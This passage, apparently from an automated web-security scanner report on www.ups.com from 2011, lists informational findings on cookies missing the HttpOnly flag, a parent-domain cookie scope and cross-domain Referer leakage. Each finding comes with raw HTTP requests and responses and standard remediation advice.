Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=L4Q2NYGKGGg41rY4v2p15X5VtBj5TZvQQ9RxQ2rRTJQ2WXTmgdTB!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17812


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.7. http://www.ups.com/search/quick

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /search/quick

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/quick HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: UPSsrch=k3qfNYGM781yrFnnG0nJqhpBnWbGJg60JW1hQpxynsXfNJJSJhVJ!2141831698!-1727860139!20402!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31677


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

5. Cookie scoped to parent domain

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes HTTP/1.1
Host: www.ups.com
Proxy-Connection: keep-alive
Referer: http://www.ups.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:15:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: defaultHome=us_en_home|1297646131685; domain=.ups.com; expires=Tuesday, 14-Feb-2012 01:15:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 124123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

6. Cross-domain Referer leakage
There are 45 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www.ups.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes HTTP/1.1
Host: www.ups.com
Proxy-Connection: keep-alive
Referer: http://www.ups.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:15:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: defaultHome=us_en_home|1297646131685; domain=.ups.com; expires=Tuesday, 14-Feb-2012 01:15:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 124123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.2. http://www.ups.com/WebTracking/track

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /WebTracking/track

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /WebTracking/track?loc=en_US&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.3. http://www.ups.com/bussol

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /bussol?loc=en_US&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=lbrFNYGGxNjLRJDYD8XJvDQG6t7p2CkK1LSmVpm85CbZbf3LhHh8!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17836


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<div class="arrow-blue"><a href="http://get.adobe.com/flashplayer/">Get Adobe&reg; Flash&reg; Player</a>
...[SNIP]...
<dt><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Feedback" alt="[+] Feedback" src="/img/icn_plus_black.gif" width="9" height="9">
...[SNIP]...

6.4. http://www.ups.com/bussol/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /bussol/?loc=en_US&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=Ym1tNYGKhbBZdq5fshhQNNqnhjW33TXphQCtzMxvLh05VhPpZj66!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17882


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<div class="arrow-blue"><a href="http://get.adobe.com/flashplayer/">Get Adobe&reg; Flash&reg; Player</a>
...[SNIP]...
<dt><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Feedback" alt="[+] Feedback" src="/img/icn_plus_black.gif" width="9" height="9">
...[SNIP]...

6.5. http://www.ups.com/content/global/index.jsx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/global/index.jsx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /content/global/index.jsx?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:23 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21763


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Global Home">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME
...[SNIP]...
<noscript>
&nbsp;<a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Feedback" alt="[+] Feedback" src="/img/icn_plus_black.gif" width="9" height="9">
...[SNIP]...

6.6. http://www.ups.com/content/us/en/about/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/about/index.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46411


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.7. http://www.ups.com/content/us/en/about/sites.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/sites.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/about/sites.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.8. http://www.ups.com/content/us/en/contact/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/contact/index.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<div class="arrow-blue"><a href="http://www.upsjobs.com/">UPS Careers</a>
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.9. http://www.ups.com/content/us/en/freight/air_freight.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/air_freight.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/freight/air_freight.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39124


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.10. http://www.ups.com/content/us/en/freight/customsbrokerage.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/customsbrokerage.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/freight/customsbrokerage.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37686


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.11. http://www.ups.com/content/us/en/freight/expedite.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/expedite.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/freight/expedite.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.12. http://www.ups.com/content/us/en/freight/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/freight/index.html?WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.13. http://www.ups.com/content/us/en/freight/ocean_freight.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/ocean_freight.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/freight/ocean_freight.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.14. http://www.ups.com/content/us/en/freight/road_freight.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/road_freight.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/freight/road_freight.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37847


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.15. http://www.ups.com/content/us/en/index.jsx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/index.jsx?WT.svl=BrndMrk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 123916


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.16. http://www.ups.com/content/us/en/locations/alliances/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/alliances/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/locations/alliances/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.17. http://www.ups.com/content/us/en/locations/aso/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/aso/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/locations/aso/index.html?WT.svl=PNRO_L1 HTTP/1.1
